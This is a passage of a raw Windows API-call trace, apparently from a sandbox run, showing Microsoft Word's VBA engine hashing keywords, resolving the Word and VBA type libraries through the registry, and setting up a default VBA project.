lcid=0x409, szName="Wend") returned 0x1035a7 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0067.985] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0067.986] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0067.986] StringFromGUID2 (in: rguid=0x6860d00*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x146980, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0067.986] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x146640 | out: phkResult=0x146640*=0xac2) returned 0x0 [0067.986] RegOpenKeyW (in: hKey=0xac2, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x146638 | out: phkResult=0x146638*=0xa32) returned 0x0 [0067.986] RegEnumKeyW (in: hKey=0xa32, dwIndex=0x0, lpName=0x146668, cchName=0xa | out: lpName="8.7") returned 0x0 [0067.987] wcscpy_s (in: _Destination=0x146650, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0067.987] RegOpenKeyW (in: hKey=0xa32, lpSubKey="8.7", phkResult=0x1466f8 | out: phkResult=0x1466f8*=0xb5e) returned 0x0 [0067.997] _ultoa_s (in: _Val=0x409, _DstBuf=0x146670, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0067.997] RegOpenKeyA (in: hKey=0xb5e, lpSubKey="409", phkResult=0x146660 | out: phkResult=0x146660*=0x0) returned 0x2 [0067.997] _ultoa_s (in: _Val=0x9, _DstBuf=0x146670, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0067.997] RegOpenKeyA (in: hKey=0xb5e, lpSubKey="9", phkResult=0x146660 | out: phkResult=0x146660*=0x0) returned 0x2 [0067.997] RegOpenKeyA (in: hKey=0xb5e, lpSubKey="0", phkResult=0x146660 | out: phkResult=0x146660*=0x92e) returned 0x0 [0067.998] RegOpenKeyW (in: hKey=0x92e, lpSubKey="win64", phkResult=0x146668 | out: phkResult=0x146668*=0x922) returned 0x0 [0067.998] RegCloseKey (hKey=0x922) returned 0x0 [0067.998] RegCloseKey (hKey=0x92e) returned 0x0 [0067.998] _ultow_s (in: _Value=0x0, _Buffer=0x146700, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.998] RegOpenKeyW (in: hKey=0xb5e, lpSubKey="0", phkResult=0x1466d8 | out: phkResult=0x1466d8*=0xb62) returned 0x0 [0067.998] RegQueryValueW (in: hKey=0xb62, lpSubKey="win64", lpData=0x146720, lpcbData=0x1466d4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x1466d4) returned 0x0 [0067.999] wcscpy_s (in: _Destination=0x146a50, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0067.999] RegCloseKey (hKey=0xb62) returned 0x0 [0067.999] RegCloseKey (hKey=0xb5e) returned 0x0 [0067.999] RegCloseKey (hKey=0xa32) returned 0x0 [0067.999] RegCloseKey (hKey=0xac2) returned 0x0 [0068.000] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x1466d8*=0x0 | out: pptlib=0x1466d8*=0x631b4c0) returned 0x0 [0068.000] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x1466f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x251af68 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x251af68*="\xdc3c\xe378\x7fe") returned 0x0 [0068.000] IUnknown:QueryInterface (in: This=0x631b4c0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1464e8 | out: ppvObject=0x1464e8*=0x0) returned 0x80004002 [0068.000] ITypeLib:RemoteGetLibAttr (in: This=0x631b4c0, ppTLibAttr=0x1464e0, pDummy=0x10 | out: ppTLibAttr=0x1464e0, pDummy=0x10) returned 0x0 [0068.000] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x0, pbstrName=0x1464d8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x64ef340 | out: pbstrName=0x1464d8*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x64ef340*="琀栀 漀甀爀猀⸀") returned 0x0 [0068.000] StringFromGUID2 (in: rguid=0x6885c90*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x146500, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0068.000] _ultow_s (in: _Value=0x8, _Buffer=0x14644a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0068.000] _ultow_s (in: _Value=0x7, _Buffer=0x14644e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0068.000] _ultow_s (in: _Value=0x0, _Buffer=0x146452, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0068.000] wcscpy_s (in: _Destination=0x429ce88, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0068.000] wcscpy_s (in: _Destination=0x429ce8e, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0068.000] wcscpy_s (in: _Destination=0x429ceda, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0068.000] wcscpy_s (in: _Destination=0x429cee8, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0068.000] wcscpy_s (in: _Destination=0x429cf5e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0068.000] ITypeLib:LocalReleaseTLibAttr (This=0x631b4c0) returned 0x0 [0068.001] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf60f10, cb=0x1a0) returned 0x67b5390 [0068.001] wcscpy_s (in: _Destination=0x67b5390, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0068.001] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x1465f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0068.001] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0068.001] strcpy_s (in: _Dst=0x1463f0, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0068.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1463f0, cbMultiByte=5, lpWideCharStr=0x146240, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0068.001] wcsncpy_s (in: _Destination=0x1461f0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0068.001] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0068.001] IMalloc:Alloc (This=0x7fefec05380, cb=0x11c) returned 0xaf59a40 [0068.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0xaf59a40, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0068.001] IMalloc:Free (This=0x7fefec05380, pv=0xaf59a40) [0068.001] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0068.001] wcsncpy_s (in: _Destination=0x1461f0, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.001] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146120, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.001] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.001] IUnknown:AddRef (This=0x631b4c0) returned 0x5 [0068.001] IUnknown:QueryInterface (in: This=0x631b4c0, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146618 | out: ppvObject=0x146618*=0x0) returned 0x80004002 [0068.001] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0068.001] IUnknown:AddRef (This=0x665ba50) returned 0x3 [0068.001] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x1466f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.001] IUnknown:QueryInterface (in: This=0x665ba50, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1464e8 | out: ppvObject=0x1464e8*=0x0) returned 0x80004002 [0068.001] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1464e0, pDummy=0x10 | out: ppTLibAttr=0x1464e0, pDummy=0x10) returned 0x0 [0068.001] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x0, pbstrName=0x1464d8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xf2cbcfb1cc68 | out: pbstrName=0x1464d8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xf2cbcfb1cc68) returned 0x0 [0068.001] StringFromGUID2 (in: rguid=0x6885c90*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x146500, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0068.002] _ultow_s (in: _Value=0x4, _Buffer=0x14644a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0068.002] _ultow_s (in: _Value=0x2, _Buffer=0x14644e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0068.002] _ultow_s (in: _Value=0x9, _Buffer=0x146452, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0068.002] wcscpy_s (in: _Destination=0x429ce88, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0068.002] wcscpy_s (in: _Destination=0x429ce8e, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0068.002] wcscpy_s (in: _Destination=0x429ceda, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0068.002] wcscpy_s (in: _Destination=0x429cee8, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0068.002] wcscpy_s (in: _Destination=0x429cf6e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0068.002] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.002] IMalloc:Realloc (This=0x7fefec05380, pv=0x67b5390, cb=0x340) returned 0x690cf20 [0068.002] wcscpy_s (in: _Destination=0x690d068, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0068.002] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x1465f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0068.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0068.002] strcpy_s (in: _Dst=0x1463f0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0068.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1463f0, cbMultiByte=4, lpWideCharStr=0x146240, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0068.002] IUnknown:AddRef (This=0x631b4c0) returned 0x5 [0068.002] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x146310, pBstrLibName=0x146240 | out: pfName=0x146310*=0, pBstrLibName=0x146240) returned 0x0 [0068.002] IUnknown:Release (This=0x631b4c0) returned 0x4 [0068.002] IMalloc:Alloc (This=0x7fefec05380, cb=0xc) returned 0x67c2ba0 [0068.002] IMalloc:Free (This=0x7fefec05380, pv=0x682e6d0) [0068.002] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e6d0 [0068.002] IMalloc:Free (This=0x7fefec05380, pv=0x67c2ba0) [0068.002] wcsncpy_s (in: _Destination=0x1461f0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0068.002] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0068.003] IMalloc:Alloc (This=0x7fefec05380, cb=0x122) returned 0xaf59a40 [0068.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0xaf59a40, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0068.003] IMalloc:Free (This=0x7fefec05380, pv=0xaf59a40) [0068.003] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0068.003] wcsncpy_s (in: _Destination=0x1461f0, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0068.003] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0068.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146120, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0068.003] _wcsicmp (_String1="*\\Z045e95ca91", _String2="*\\Z045e95ca91") returned 0 [0068.003] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.003] IUnknown:QueryInterface (in: This=0x665ba50, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146618 | out: ppvObject=0x146618*=0x0) returned 0x80004002 [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0068.003] qsort (in: _Base=0x6a59920, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee38d5594 | out: _Base=0x6a59920) [0068.003] IMalloc:Free (This=0x7fefec05380, pv=0x6a59920) [0068.003] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2ba0 [0068.003] IMalloc:Alloc (This=0x7fefec05380, cb=0xc) returned 0x67bfee0 [0068.003] IMalloc:GetSize (This=0x7fefec05380, pv=0x67bfee0) returned 0xc [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0068.003] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0068.003] IMalloc:Free (This=0x7fefec05380, pv=0x6a59900) [0068.004] IMalloc:Free (This=0x7fefec05380, pv=0x6a59910) [0068.004] CoCreateGuid (in: pguid=0x146cc8 | out: pguid=0x146cc8*(Data1=0x998cbd0f, Data2=0x887f, Data3=0x477b, Data4=([0]=0xb1, [1]=0x41, [2]=0xbc, [3]=0xe7, [4]=0xbc, [5]=0x19, [6]=0xcd, [7]=0xac))) returned 0x0 [0068.004] wcsncmp (_String1="*\\Z", _String2="*\\Z", _MaxCount=0x3) returned 0 [0068.004] CoCreateGuid (in: pguid=0x6a187b8 | out: pguid=0x6a187b8*(Data1=0xfc7b4510, Data2=0xf2b, Data3=0x44a9, Data4=([0]=0x81, [1]=0x8e, [2]=0x8e, [3]=0x5, [4]=0x1b, [5]=0xe3, [6]=0x2f, [7]=0x67))) returned 0x0 [0068.004] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x0) returned 0x6a59910 [0068.004] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69f9090 [0068.004] strcpy_s (in: _Dst=0x6a18818, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0068.004] LoadStringA (in: hInstance=0x7fee2cb0000, uID=0x32f3, lpBuffer=0x251b1f8, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0068.005] wsprintfA (in: param_1=0x251b1ff, param_2="%d" | out: param_1="1") returned 1 [0068.005] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0068.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6884528, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0068.005] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0068.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6884528, cbMultiByte=8, lpWideCharStr=0x6885c98, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0068.005] lstrlenA (lpString="Project") returned 7 [0068.005] lstrcmpiA (lpString1="Project", lpString2="Project1") returned -1 [0068.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x251b1f8, cbMultiByte=-1, lpWideCharStr=0x1479a0, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0068.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x147890, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0068.005] lstrcmpiA (lpString1="", lpString2="Project1") returned -1 [0068.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x147790, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0068.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0068.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x1476a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 